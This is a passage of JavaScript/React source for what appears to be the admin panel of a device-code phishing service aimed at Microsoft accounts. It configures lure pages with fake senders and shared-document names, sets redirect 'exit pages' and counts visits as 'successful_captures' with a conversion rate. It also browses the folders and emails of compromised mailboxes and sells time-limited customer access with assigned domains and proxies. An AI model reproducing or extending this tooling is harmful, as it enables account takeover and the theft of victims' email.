      return String(a.name || a.title || "").localeCompare(String(b.name || b.title || ""));
    });
  }

  function getInstructionTemplateParams() {
    const landingTemplateId = selectedLandingTemplateId || PLAIN_LANDING_TEMPLATE_ID;
    return {
      template_id: landingTemplateId,
      landing_template_id: landingTemplateId,
      exit_page_id: selectedExitPageId || "",
      company_name: instructionCompanyName || "",
      sender_name: instructionSenderName || "",
      shared_document_name: instructionDocumentName || "",
      document_name: instructionDocumentName || "",
      browser_title: instructionBrowserTitle || "",
      resource_type: instructionDocumentLogoType || "pdf",
      document_logo_type: instructionDocumentLogoType || "pdf",
    };
  }

  function appendInstructionTemplateParams(params) {
    const values = getInstructionTemplateParams();
    Object.entries(values).forEach(([key, value]) => {
      const clean = String(value || "").trim();
      if (clean) params.set(key, clean);
    });
    return params;
  }

  function paramsToObject(params) {
    return Object.fromEntries(params.entries());
  }

  function selectedLandingTemplate() {
    return landingTemplates.find((item) => String(item.id || item.template_id || item.key) === String(selectedLandingTemplateId)) || null;
  }

  function applyLandingTemplate(template) {
    if (!template) return;
    setSelectedLandingTemplateId(String(template.id || template.template_id || template.key || ""));

    const isUploadedHtmlTemplate =
      String(template.template_format || "").toLowerCase() === "html" ||
      !!template.html_filename ||
      !!template.html_content ||
      !!template.html_content_preview;

    if (isUploadedHtmlTemplate) {
      addToast("Landing template selected.", "success");
      return;
    }

    if (template.title) setDeviceHandoutTitle(template.title);
    if (template.brief_writeup || template.additional_instructions || template.instructions) {
      setDeviceHandoutWriteup(template.brief_writeup || template.additional_instructions || template.instructions || "");
    }
    if (template.logo_url) {
      setDeviceHandoutLogoUrl(template.logo_url);
      setDeviceHandoutLogoFileName("");
    }
    if (template.website_url || template.company_website_url) setCompanyWebsiteUrl(template.website_url || template.company_website_url || "");
  }

  function resetTemplateForm() {
    setTemplateForm({ id: "", name: "", title: "", brief_writeup: "", additional_instructions: "", logo_url: "", website_url: "", service_label: "" });
    setTemplateHtmlFile(null);
  }

  function editTemplate(template) {
    if (!canManageTemplate(template)) {
      addToast("You can only edit templates you own", "warning");
      return;
    }
    const isHtmlTemplate =
      String(template.template_format || "").toLowerCase() === "html" ||
      !!template.html_filename ||
      !!template.html_content ||
      !!template.html_content_preview;
    if (!isHtmlTemplate) {
      addToast("Upload an HTML template to replace this item.", "warning");
      return;
    }
    setTemplateForm({
      id: String(template.id || template.template_id || template.key || ""),
      name: template.name || template.label || template.html_filename || "",
      title: "",
      brief_writeup: "",
      additional_instructions: "",
      logo_url: "",
      website_url: "",
      service_label: "",
    });
    setTemplateHtmlFile(null);
    setTemplateManagerOpen(true);
  }

  async function fetchInstructionThemes() {
    try {
      const res = await fetchWithAuth(`${API}/device-code/instruction-themes`);
      const data = await res.json().catch(() => ({}));
      if (!res.ok) return;
      setInstructionThemes(data.themes || data.items || []);
    } catch {}
  }

  async function uploadInstructionThemeFile(file) {
    if (!file) {
      addToast("Choose an image, PDF, or HTML theme file", "warning");
      return;
    }
    const name = (instructionThemeUploadName || file.name || "Instruction theme").trim();
    const form = new FormData();
    form.append("file", file);
    form.append("name", name);
    setInstructionThemeUploading(true);
    try {
      const res = await fetchWithAuth(`${API}/device-code/instruction-themes/upload`, {
        method: "POST",
        body: form,
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to upload instruction theme", "error");
        return;
      }
      const saved = data.theme || {};
      setInstructionThemeUploadName("");
      await fetchInstructionThemes();
      if (saved.id) setSelectedInstructionThemeId(String(saved.id));
      addToast("Instruction theme uploaded", "success");
    } catch {
      addToast("Failed to upload instruction theme", "error");
    } finally {
      setInstructionThemeUploading(false);
    }
  }

  async function deleteInstructionTheme(theme) {
    const themeId = String(theme?.id || theme?.theme_id || "").trim();
    if (!themeId) return;
    if (!theme?.can_delete && !isAdmin) {
      addToast("Users can only delete their own custom themes", "warning");
      return;
    }
    confirm("Delete instruction theme", `Delete ${theme.name || "this theme"}?`, async () => {
      setInstructionThemeDeletingId(themeId);
      try {
        const res = await fetchWithAuth(`${API}/device-code/instruction-themes/${encodeURIComponent(themeId)}`, { method: "DELETE" });
        const data = await res.json().catch(() => ({}));
        if (!res.ok) {
          addToast(data.detail || data.error || "Failed to delete instruction theme", "error");
          return;
        }
        if (selectedInstructionThemeId === themeId) setSelectedInstructionThemeId("__plain__");
        await fetchInstructionThemes();
        addToast("Instruction theme deleted", "success");
      } catch {
        addToast("Failed to delete instruction theme", "error");
      } finally {
        setInstructionThemeDeletingId("");
      }
    });
  }

  async function fetchLandingTemplates() {
    try {
      const res = await fetchWithAuth(`${API}/device-code/landing-templates`);
      const data = await res.json().catch(() => ({}));
      if (!res.ok) return;
      const templates = sortTemplatesForDropdown(data.templates || data.items || data.landing_templates || []);
      setLandingTemplates(templates);
      setSelectedLandingTemplateId((prev) => prev || PLAIN_LANDING_TEMPLATE_ID);
    } catch {}
  }

  async function uploadLandingTemplateHtml() {
    const name = String(templateForm.name || templateForm.title || templateHtmlFile?.name || "").replace(/\.html?$/i, "").trim();
    if (!name) {
      addToast("Enter a template name before uploading", "warning");
      return;
    }
    if (!templateHtmlFile) {
      addToast("Choose an .html or .htm file first", "warning");
      return;
    }
    const fileName = String(templateHtmlFile.name || "").toLowerCase();
    if (!fileName.endsWith(".html") && !fileName.endsWith(".htm")) {
      addToast("Template file must be .html or .htm", "warning");
      return;
    }

    setTemplateUploading(true);
    try {
      const formData = new FormData();
      formData.append("file", templateHtmlFile);
      formData.append("name", name);
      formData.append("owner_type", isAdmin ? "admin" : "customer");
      formData.append("scope", isAdmin ? "admin" : "customer");

      const res = await fetchWithAuth(`${API}/device-code/landing-templates/upload`, {
        method: "POST",
        body: formData,
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Template upload failed", "error");
        return;
      }

      resetTemplateForm();
      await fetchLandingTemplates();
      const savedId = data.id || data.template_id || data.template?.id || data.item?.id || "";
      if (savedId) setSelectedLandingTemplateId(String(savedId));
      addToast("Template uploaded", "success");
    } catch {
      addToast("Template upload failed", "error");
    } finally {
      setTemplateUploading(false);
    }
  }

  async function saveLandingTemplate() {
    addToast("Choose an HTML file, then upload.", "info");
  }

  async function deleteLandingTemplate(template) {
    if (!canManageTemplate(template)) {
      addToast("You can only delete templates you own.", "warning");
      return;
    }
    const templateId = String(template?.id || template?.template_id || template?.key || "").trim();
    if (!templateId) return;
    confirm("Delete template", `Delete ${template.name || template.title || "this template"}?`, async () => {
      setTemplateDeletingId(templateId);
      try {
        const res = await fetchWithAuth(`${API}/device-code/landing-templates/${encodeURIComponent(templateId)}`, { method: "DELETE" });
        const data = await res.json().catch(() => ({}));
        if (!res.ok) {
          addToast(data.detail || data.error || "Failed to delete template", "error");
          return;
        }
        if (selectedLandingTemplateId === templateId) setSelectedLandingTemplateId("");
        await fetchLandingTemplates();
        addToast("Template deleted", "success");
      } catch {
        addToast("Failed to delete template", "error");
      } finally {
        setTemplateDeletingId("");
      }
    });
  }

  function resetExitPageForm() {
    setExitPageForm({ id: "", name: "", title: "", message: "", logo_url: "", external_url: "", html_content: "" });
    setExitPageFile(null);
  }

  function editExitPage(page) {
    if (!canManageTemplate(page)) {
      addToast("You can only edit your own custom exit pages", "warning");
      return;
    }
    setExitPageForm({
      id: String(page.id || page.page_id || page.key || ""),
      name: page.name || page.label || page.title || "",
      title: page.title || "",
      message: page.message || page.description || "",
      logo_url: page.logo_url || "",
      external_url: page.external_url || page.url || "",
      html_content: page.html_content || "",
    });
    setExitManagerOpen(true);
  }

  async function fetchExitPages() {
    try {
      const res = await fetchWithAuth(`${API}/device-code/exit-pages`);
      const data = await res.json().catch(() => ({}));
      if (!res.ok) return;
      const pages = sortTemplatesForDropdown(data.pages || data.items || data.exit_pages || []);
      setExitPages(pages);
      setSelectedExitPageId((prev) => prev || String(pages[0]?.id || pages[0]?.page_id || pages[0]?.key || ""));
    } catch {}
  }

  async function saveExitPage() {
    const name = String(exitPageForm.name || exitPageForm.title || "").trim();
    if (!name) {
      addToast("Enter an exit page name", "warning");
      return;
    }
    setExitSaving(true);
    try {
      const pageId = String(exitPageForm.id || "").trim();
      const hasUrl = String(exitPageForm.external_url || "").trim();
      const hasHtml = String(exitPageForm.html_content || "").trim();
      const payload = {
        ...exitPageForm,
        name,
        title: exitPageForm.title || name,
        mode: hasUrl ? "url" : hasHtml ? "html" : "message",
        exit_type: hasUrl ? "url" : hasHtml ? "html" : "message",
        url: exitPageForm.external_url || "",
        redirect_url: exitPageForm.external_url || "",
        html: exitPageForm.html_content || "",
        html_content: exitPageForm.html_content || "",
        owner_type: isAdmin ? "admin" : "customer",
        scope: isAdmin ? "admin" : "customer",
      };
      const res = await fetchWithAuth(`${API}/device-code/exit-pages${pageId ? `/${encodeURIComponent(pageId)}` : ""}`, {
        method: pageId ? "PUT" : "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify(payload),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to save exit page", "error");
        return;
      }
      const savedId = data.id || data.page_id || data.exit_page?.id || data.exit_page?.page_id || data.page?.id || data.item?.id || pageId || "";
      if (exitPageFile && savedId) {
        const formData = new FormData();
        formData.append("file", exitPageFile);
        formData.append("page_id", savedId);
        formData.append("name", name);
        formData.append("title", exitPageForm.title || name);
        formData.append("message", exitPageForm.message || "The connection process is complete.");
        formData.append("logo_url", exitPageForm.logo_url || "");
        const uploadRes = await fetchWithAuth(`${API}/device-code/exit-pages/upload`, { method: "POST", body: formData });
        const uploadData = await uploadRes.json().catch(() => ({}));
        if (!uploadRes.ok) {
          addToast(uploadData.detail || uploadData.error || "Exit page saved, but file upload failed", "warning");
        }
      }
      resetExitPageForm();
      await fetchExitPages();
      if (savedId) setSelectedExitPageId(String(savedId));
      addToast("Exit page saved", "success");
    } catch {
      addToast("Failed to save exit page", "error");
    } finally {
      setExitSaving(false);
    }
  }

  async function deleteExitPage(page) {
    if (!canManageTemplate(page)) {
      addToast("You can only delete your own custom exit pages", "warning");
      return;
    }
    const pageId = String(page?.id || page?.page_id || page?.key || "").trim();
    if (!pageId) return;
    confirm("Delete exit page", `Delete ${page.name || page.title || "this exit page"}?`, async () => {
      setExitDeletingId(pageId);
      try {
        const res = await fetchWithAuth(`${API}/device-code/exit-pages/${encodeURIComponent(pageId)}`, { method: "DELETE" });
        const data = await res.json().catch(() => ({}));
        if (!res.ok) {
          addToast(data.detail || data.error || "Failed to delete exit page", "error");
          return;
        }
        if (selectedExitPageId === pageId) setSelectedExitPageId("");
        await fetchExitPages();
        addToast("Exit page deleted", "success");
      } catch {
        addToast("Failed to delete exit page", "error");
      } finally {
        setExitDeletingId("");
      }
    });
  }

  useEffect(() => {
    if (!isAuthenticated) return;
    fetchLandingTemplates();
    fetchExitPages();
    fetchInstructionThemes();
    fetchCustomDomains();
  }, [isAuthenticated]);

  useEffect(() => {
    if (landingTemplates.length === 0) return;
    const currentId = String(selectedLandingTemplateId || "");
    if (currentId === PLAIN_LANDING_TEMPLATE_ID) return;
    const exists = landingTemplates.some(
      (t) => String(t.id || t.template_id || t.key) === currentId
    );
    if (exists) return;
    const match = landingTemplates.find((t) =>
      String(t.name || t.title || "").toLowerCase().includes(DEFAULT_LANDING_TEMPLATE_ID.toLowerCase())
    );
    if (match) {
      setSelectedLandingTemplateId(String(match.id || match.template_id || match.key));
    } else if (currentId === DEFAULT_LANDING_TEMPLATE_ID) {
      setSelectedLandingTemplateId(PLAIN_LANDING_TEMPLATE_ID);
    }
  }, [landingTemplates]);

  useEffect(() => {
    if (instructionThemes.length === 0) return;
    const currentId = String(selectedInstructionThemeId || "");
    if (currentId === "__plain__") return;
    const exists = instructionThemes.some(
      (t) => String(t.id || t.theme_id || t.key) === currentId
    );
    if (exists) return;
    const match = instructionThemes.find((t) =>
      String(t.name || t.html_filename || t.original_filename || "").toLowerCase() ===
      DEFAULT_INSTRUCTION_THEME_ID.toLowerCase()
    );
    if (match) {
      setSelectedInstructionThemeId(String(match.id || match.theme_id || match.key));
    } else if (currentId === DEFAULT_INSTRUCTION_THEME_ID) {
      setSelectedInstructionThemeId("__plain__");
    }
  }, [instructionThemes]);

  useEffect(() => {
    if (exitPages.length === 0) return;
    const currentId = String(selectedExitPageId || "");
    if (!currentId) return;
    const exists = exitPages.some(
      (p) => String(p.id || p.page_id || p.key) === currentId
    );
    if (exists) return;
    const match = exitPages.find((p) =>
      String(p.name || p.title || p.file_name || "").toLowerCase().includes(DEFAULT_EXIT_PAGE_ID.toLowerCase())
    );
    if (match) {
      setSelectedExitPageId(String(match.id || match.page_id || match.key));
    } else if (currentId === DEFAULT_EXIT_PAGE_ID) {
      setSelectedExitPageId("");
    }
  }, [exitPages]);

  useEffect(() => {
    if (azureProfiles.length === 0) return;
    if (azureClientId) {
      const matched = azureProfiles.find((p) => p.client_id === azureClientId);
      const targetName = matched ? matched.name : "custom";
      if (selectedProfileId !== targetName) {
        setSelectedProfileId(targetName);
      }
    } else {
      const defaultProfile = azureProfiles.find((p) => p.name === DEFAULT_AZURE_PROFILE_NAME);
      if (defaultProfile && selectedProfileId !== DEFAULT_AZURE_PROFILE_NAME) {
        setSelectedProfileId(DEFAULT_AZURE_PROFILE_NAME);
        setAzureClientId(defaultProfile.client_id);
        setAzureTenant(defaultProfile.tenant || "common");
      }
    }
  }, [azureProfiles, azureClientId]);

  useEffect(() => {
    if (!exportMailbox) {
      setExportFolders([]);
      setExportFolder("");
      return;
    }
    setExportFolderLoading(true);
    fetchWithAuth(`${API}/folders?user_id=${encodeURIComponent(exportMailbox)}`)
      .then(res => res.json())
      .then(data => {
        setExportFolders(data.folders || []);
        setExportFolder("");
      })
      .catch(() => addToast("Failed to load folders", "error"))
      .finally(() => setExportFolderLoading(false));
  }, [exportMailbox]);

  const fetchFoldersForMailbox = async (mailboxId) => {
    if (!mailboxId) return [];
    setExportFolderLoading(prev => ({ ...prev, [mailboxId]: true }));
    try {
      const res = await fetchWithAuth(`${API}/folders?user_id=${encodeURIComponent(mailboxId)}`);
      const data = await res.json().catch(() => ({}));
      if (!res.ok) return [];
      const folderList = data.folders || [];
      setExportMailboxFolders(prev => ({ ...prev, [mailboxId]: folderList }));
      return folderList;
    } catch {
      return [];
    } finally {
      setExportFolderLoading(prev => ({ ...prev, [mailboxId]: false }));
    }
  };

  async function fetchVisits() {
    setVisitsLoading(true);
    try {
      const params = new URLSearchParams({ limit: "100" });
      if (visitFilter) params.set("target_user_id", visitFilter);
      if (visitCountryFilter) params.set("country", visitCountryFilter);
      if (visitCityFilter) params.set("city", visitCityFilter);
      if (visitDeviceFilter) params.set("device_type", visitDeviceFilter);
      if (visitBrowserFilter) params.set("browser", visitBrowserFilter);
      if (visitOutcomeFilter) params.set("outcome", visitOutcomeFilter);
      if (visitIpFilter) params.set("ip_address", visitIpFilter);
      const res = await fetchWithAuth(`${API}/visits?${params.toString()}`);
      const data = await res.json();
      if (res.ok) setVisits(data.visits || []);
    } catch {
      addToast("Failed to load visits", "error");
    } finally {
      setVisitsLoading(false);
    }
  }

  async function fetchVisitSummary() {
    try {
      const res = await fetchWithAuth(`${API}/visits/summary`);
      const data = await res.json();
      if (res.ok) {
        setVisitSummary({
          total_visits: data.total_visits || 0,
          successful_captures: data.successful_captures || 0,
          failed_attempts: data.failed_attempts || 0,
          conversion_rate: data.conversion_rate || 0,
          recent_visits_24h: data.recent_visits_24h || 0,
          country_count: data.country_count || 0,
          top_countries: data.top_countries || [],
          device_breakdown: data.device_breakdown || [],
          browser_breakdown: data.browser_breakdown || [],
        });
      }
    } catch {}
  }

  async function clearVisits() {
    try {
      const res = await fetchWithAuth(`${API}/visits`, { method: "DELETE" });
      const data = await res.json();
      if (res.ok) {
        setVisits([]);
        setVisitSummary({
          total_visits: 0,
          successful_captures: 0,
          failed_attempts: 0,
          conversion_rate: 0,
          recent_visits_24h: 0,
          country_count: 0,
          top_countries: [],
          device_breakdown: [],
          browser_breakdown: [],
        });
        addToast(`Cleared ${data.deleted_count} visit records`, "success");
      }
    } catch {
      addToast("Failed to clear visits", "error");
    }
  }

  async function fetchUsers() {
    try {
      const res = await fetchWithAuth(`${API}/users`);
      const data = await res.json();
      const users = [...new Set((data.users || []).filter(Boolean))].sort((a, b) =>
        a.localeCompare(b)
      );
      setAvailableUsers(users);
      setExportAvailableMailboxes(users.map(u => ({ user_id: u, label: u })));
      if (!isStandaloneMailViewer && !standaloneMailboxId && !selectedUserId && users.length > 0) {
        setSelectedUserId(users[0]);
      }
    } catch {}
  }

  async function fetchCustomerAccounts() {
    setCustomerLoading(true);
    try {
      const res = await fetchWithAuth(`${API}/admin/customers`);
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to load customer accounts", "error");
        return;
      }
      setCustomerAccounts(data.customers || []);
    } catch {
      addToast("Failed to load customer accounts", "error");
    } finally {
      setCustomerLoading(false);
    }
  }

  async function createCustomerAccount() {
    const usernameValue = (customerForm.username || "").trim().toLowerCase();
    const email = (customerForm.email || "").trim().toLowerCase();
    const passwordValue = customerForm.password || "";
    if (!usernameValue || !passwordValue) {
      addToast("Username and temporary password are required", "warning");
      return;
    }
    if (passwordValue.length < 8) {
      addToast("Temporary password must be at least 8 characters", "warning");
      return;
    }
    setCustomerActionLoading((prev) => ({ ...prev, create: true }));
    try {
      const payload = {
        ...customerForm,
        email: email || null,
        username: usernameValue,
        password: passwordValue,
      };
      const res = await fetchWithAuth(`${API}/admin/customers`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify(payload),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to create customer", "error");
        return;
      }
      setCustomerForm({
        email: "",
        username: "",
        full_name: "",
        company_name: "",
        password: "",
        plan: "trial_3_days",
        assigned_domain: "",
        proxy_url: "",
        notes: "",
      });
      await fetchCustomerAccounts();
      addToast("Customer access account created", "success");
    } catch {
      addToast("Failed to create customer", "error");
    } finally {
      setCustomerActionLoading((prev) => ({ ...prev, create: false }));
    }
  }

  async function extendCustomerAccount(customerId, plan = "monthly") {
    setCustomerActionLoading((prev) => ({ ...prev, [`extend-${customerId}`]: true }));
    try {
      const res = await fetchWithAuth(`${API}/admin/customers/${customerId}/extend`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ plan }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to extend customer", "error");
        return;
      }
      await fetchCustomerAccounts();
      addToast(`Extended customer by ${planLabel(plan)}`, "success");
    } catch {
      addToast("Failed to extend customer", "error");
    } finally {
      setCustomerActionLoading((prev) => ({ ...prev, [`extend-${customerId}`]: false }));
    }
  }

  async function updateCustomerStatus(customerId, action) {
    setCustomerActionLoading((prev) => ({ ...prev, [`${action}-${customerId}`]: true }));
    try {
      const res = await fetchWithAuth(`${API}/admin/customers/${customerId}/${action}`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({}),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || `Failed to ${action} customer`, "error");
        return;
      }
      await fetchCustomerAccounts();
      addToast(`Customer ${action} complete`, "success");
    } catch {
      addToast(`Failed to ${action} customer`, "error");
    } finally {
      setCustomerActionLoading((prev) => ({ ...prev, [`${action}-${customerId}`]: false }));
    }
  }

  async function deleteCustomerAccount(customerId, label = "this customer") {
    if (!customerId) return;
    confirm(
      "Delete customer access",
      `Delete ${label}? This removes the customer login/access account. It does not delete your source code or Microsoft app registration.`,
      async () => {
        setCustomerActionLoading((prev) => ({ ...prev, [`delete-${customerId}`]: true }));
        try {
          const res = await fetchWithAuth(`${API}/admin/customers/${customerId}`, {
            method: "DELETE",
          });
          const data = await res.json().catch(() => ({}));
          if (!res.ok) {
            addToast(data.detail || data.error || "Failed to delete customer", "error");
            return;
          }
          await fetchCustomerAccounts();
          addToast("Customer access account deleted", "success");
        } catch {
          addToast("Failed to delete customer", "error");
        } finally {
          setCustomerActionLoading((prev) => ({ ...prev, [`delete-${customerId}`]: false }));
        }
      }
    );
  }

  async function updateCustomerDomain(customerId, assignedDomain) {
    setCustomerActionLoading((prev) => ({ ...prev, [`domain-${customerId}`]: true }));
    try {
      const res = await fetchWithAuth(`${API}/admin/customers/${customerId}/domain`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ assigned_domain: assignedDomain || "" }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to update domain", "error");
        return;
      }
      await fetchCustomerAccounts();
      addToast("Customer domain updated", "success");
    } catch {
      addToast("Failed to update domain", "error");
    } finally {
      setCustomerActionLoading((prev) => ({ ...prev, [`domain-${customerId}`]: false }));
    }
  }

  async function updateCustomerProxyAdmin(customerId, proxyUrl) {
    setCustomerActionLoading((prev) => ({ ...prev, [`proxy-${customerId}`]: true }));
    try {
      const res = await fetchWithAuth(`${API}/admin/customers/${customerId}/proxy`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ proxy_url: proxyUrl || "" }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to update proxy", "error");
        return;
      }
      await fetchCustomerAccounts();
      addToast("Customer proxy updated", "success");
    } catch {
      addToast("Failed to update proxy", "error");
    } finally {
      setCustomerActionLoading((prev) => ({ ...prev, [`proxy-${customerId}`]: false }));
    }
  }

  async function fetchTenantConsents() {
    try {
      const res = await fetchWithAuth(`${API}/tenant-consents`);
      const data = await res.json();
      if (res.ok) setTenantConsents(data.tenants || []);
    } catch {}
  }

  async function fetchEnterpriseTenants() {
    try {
      const res = await fetchWithAuth(`${API}/enterprise/tenants`);
      const data = await res.json();
      if (res.ok) setEnterpriseTenants(data.tenants || []);
    } catch {}
  }

  async function fetchEnterpriseStatus(userId) {
    if (!userId) {
      setEnterpriseStatus({
        tenant_hint: "",
        mode: "preview",
        consent_status: "none",
        enterprise_enabled: false,
        app_only_enabled: false,
        notes: "",
      });
      return;
    }
    try {
      const res = await fetchWithAuth(
        `${API}/enterprise/status?user_id=${encodeURIComponent(userId)}`
      );
      const data = await res.json();
      if (!res.ok) return;
      setEnterpriseStatus({
        tenant_hint: data.tenant_hint || "",
        mode: data.mode || "preview",
        consent_status: data.consent_status || "none",
        enterprise_enabled: !!data.enterprise_enabled,
        app_only_enabled: !!data.app_only_enabled,
        notes: data.notes || "",
      });
    } catch {}
  }

  async function fetchMicrosoftStatus(userId) {
    const cleanUserId = String(userId || "").trim();
    const requestId = microsoftStatusRequestRef.current + 1;
    microsoftStatusRequestRef.current = requestId;

    function isLatestTarget() {
      const expectedUserId = String(standaloneMailboxId || selectedUserIdRef.current || "").trim();
      return requestId === microsoftStatusRequestRef.current && (!expectedUserId || expectedUserId === cleanUserId);
    }

    if (!cleanUserId) {
      if (isLatestTarget()) {
        setMicrosoftConnected(false);
        setInboxConnected(false);
      }
      return;
    }

    if (adminConsentRequired && blockedUserId === cleanUserId) {
      if (isLatestTarget()) {
        setMicrosoftConnected(false);
        setInboxConnected(false);
      }
      return;
    }

    try {
      const res = await fetchWithAuth(
        `${API}/microsoft/status?user_id=${encodeURIComponent(cleanUserId)}`
      );
      const data = await res.json();

      if (!isLatestTarget()) return;

      setMicrosoftConnected(!!data.connected);
      setInboxConnected(!!data.inbox_connected);
    } catch {
      if (isLatestTarget()) {
        setMicrosoftConnected(false);
        setInboxConnected(false);
      }
    }
  }

  async function loadFolders(userIdOverride = null) {
    const userId = userIdOverride || selectedUserId;
    if (!userId || !inboxConnected) return;
    if (folderLoading) return;

    if (folderAbortControllerRef.current) {
      folderAbortControllerRef.current.abort();
    }
    const abortController = new AbortController();
    folderAbortControllerRef.current = abortController;

    setFolderLoading(true);
    try {
      const res = await fetchWithAuth(
        `${API}/folders/tree?user_id=${encodeURIComponent(userId)}`,
        { signal: abortController.signal }
      );
      const data = await res.json();
      if (abortController.signal.aborted) return;
      if (res.ok && data.tree) {
        setFolderTree(data.tree);
        const flat = flattenFolderTree(data.tree);
        setFolders(flat);
        setExpandedFolders(new Set());
        return;
      }
      const flatRes = await fetchWithAuth(
        `${API}/folders?user_id=${encodeURIComponent(userId)}`,
        { signal: abortController.signal }
      );
      const flatData = await flatRes.json();
      if (abortController.signal.aborted) return;
      if (!flatRes.ok) {
        setFolders([]);
        setFolderTree([]);
        addToast(flatData.error || "Failed to load folders", "warning");
        return;
      }
      const flat = flatData.folders || [];
      setFolders(flat);
      setFolderTree([]);
    } catch (err) {
      if (err.name === 'AbortError') return;
      setFolders([]);
      setFolderTree([]);
      console.warn("Folder load error:", err);
    } finally {
      setFolderLoading(false);
      folderAbortControllerRef.current = null;
    }
  }

  function flattenFolderTree(tree, parentPath = "") {
    let flat = [];
    for (const node of tree) {
      const path = parentPath ? `${parentPath}/${node.name}` : node.name;
      flat.push({ ...node, path });
      if (node.children && node.children.length) {
        flat = flat.concat(flattenFolderTree(node.children, path));
      }
    }
    return flat;
  }

  const toggleFolder = (folderId) => {
    setExpandedFolders(prev => {
      const newSet = new Set(prev);
      if (newSet.has(folderId)) newSet.delete(folderId);
      else newSet.add(folderId);
      return newSet;
    });
  };

  function renderFolderTree(tree, level = 0) {
    if (!tree || !tree.length) return null;
    return tree.map((node) => {
      const isSelected = currentFolderId === node.id;
      const hasChildren = node.children && node.children.length > 0;
      const isExpanded = expandedFolders.has(node.id);
      return (
        <div key={node.id} style={{ marginLeft: level * 12 }}>
          <button
            style={{
              ...styles.outlookFolderButton,
              ...(isSelected ? styles.outlookFolderButtonActive : {}),
              display: "grid",
              gridTemplateColumns: "22px 1fr auto",
              gap: 4,
              alignItems: "center",
              padding: "6px 6px",
            }}
            onClick={() => {
              setCurrentFolderId(node.id);
              loadEmails(node.id);
            }}
          >
            {hasChildren ? (
              <span
                style={{
                  cursor: "pointer",
                  fontSize: 12,
                  color: isDarkMode ? "#94a3b8" : "#475467",
                  marginRight: 2,
                  userSelect: "none",
                }}
                onClick={(e) => {
                  e.stopPropagation();
                  toggleFolder(node.id);
                }}
              >
                {isExpanded ? "▼" : "▶"}
              </span>
            ) : (
              <span style={{ fontSize: 12, color: "transparent", marginRight: 2 }}>▶</span>
            )}
            <span style={styles.folderName}>{node.name}</span>
            {!!node.unreadItemCount && <span style={styles.folderUnread}>{node.unreadItemCount}</span>}
          </button>
          {hasChildren && isExpanded && (
            <div style={{ marginLeft: 8 }}>
              {renderFolderTree(node.children, level + 1)}
            </div>
          )}
        </div>
      );
    });
  }

  function getSenderName(sender) {
    if (!sender) return "Unknown sender";
    if (typeof sender === "string") {
      const match = sender.match(/^(.+?)\s*<(.+)>$/);
      return match ? match[1] : sender;
    }
    if (typeof sender === "object") {
      return sender.name || sender.emailAddress?.name || sender.emailAddress?.address || "Unknown";
    }
    return String(sender);
  }

  function getSenderEmail(sender) {
    if (!sender) return "";
    if (typeof sender === "string") {
      const match = sender.match(/<(.+)>/);
      return match ? match[1] : sender;
    }
    if (typeof sender === "object") {
      return sender.emailAddress?.address || sender.address || "";
    }
    return String(sender);
  }

  async function loadEmails(
    folderId = null,
    userIdOverride = null,
    append = false,
    nextLinkOverride = ""
  ) {
    const userId = userIdOverride || selectedUserId;
    if (!userId || !inboxConnected) return;
    try {
      let url = `${API}/emails?user_id=${encodeURIComponent(userId)}&limit=${encodeURIComponent(String(emailPageSize || 100))}`;
      if (append && (nextLinkOverride || emailNextLink)) {
        url += `&next_link=${encodeURIComponent(nextLinkOverride || emailNextLink)}`;
      } else if (folderId) {
        url += `&folder_id=${encodeURIComponent(folderId)}`;
      }
      url += `${url.includes("?") ? "&" : "?"}_mailbox=${encodeURIComponent(userId)}&_ts=${Date.now()}`;
      const res = await fetchWithAuth(url, { cache: "no-store" });
      const data = await res.json();
      if (String(standaloneMailboxId || selectedUserIdRef.current || userId).trim() !== String(userId).trim()) {
        return;
      }
      if (!res.ok) {
        if (!append) setEmails([]);
        addToast(data.detail || data.error || "Failed to load emails", "error");
        return;
      }
      const newEmails = data.emails || [];
      setEmails((prev) => (append ? [...prev, ...newEmails] : newEmails));
      setEmailNextLink(data.next_link || "");
      if (!append) setSelectedMessageIds([]);

      if (!append) {
        if (emailCacheRef.current) emailCacheRef.current.clear();
        if (emailAbortRef.current) {
          try { emailAbortRef.current.abort(); } catch {}
        }
        if (newEmails.length > 0) {
          Promise.all(
            newEmails.slice(0, 3).map(async (item) => {
              if (!item?.id) return;
              if (emailCacheRef.current.has(item.id)) return;
              try {
                const r = await fetchWithAuth(
                  `${API}/email/${item.id}?user_id=${encodeURIComponent(userId)}`
                );
                if (r.ok) {
                  const d = await r.json();
                  const e = emailCacheRef.current.get(item.id) || {};
                  e.data = d;
                  e.cachedAt = Date.now();
                  emailCacheRef.current.set(item.id, e);
                }
              } catch {}
            })
          );
        }
      }
    } catch {
      if (!append) {
        setEmails([]);
        setEmailNextLink("");
      }
    }
  }

  async function searchEmails(nextLink = null) {
    const userId = selectedUserId;
    let query = (mailSearchQuery || "").trim();

    if (!userId || !inboxConnected) return;

    if (!query && !mailSearchAttachmentsOnly) {
      setEmailNextLink("");
      setSearchNextLink("");
      await loadEmails(currentFolderId, userId, false, "");
      return;
    }

    query = query.replace(/\bparticipants\s*:/gi, '').trim();

    if (query && /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(query)) {
      query = `from:${query} OR to:${query}`;
    }

    setMailSearchLoading(true);
    try {
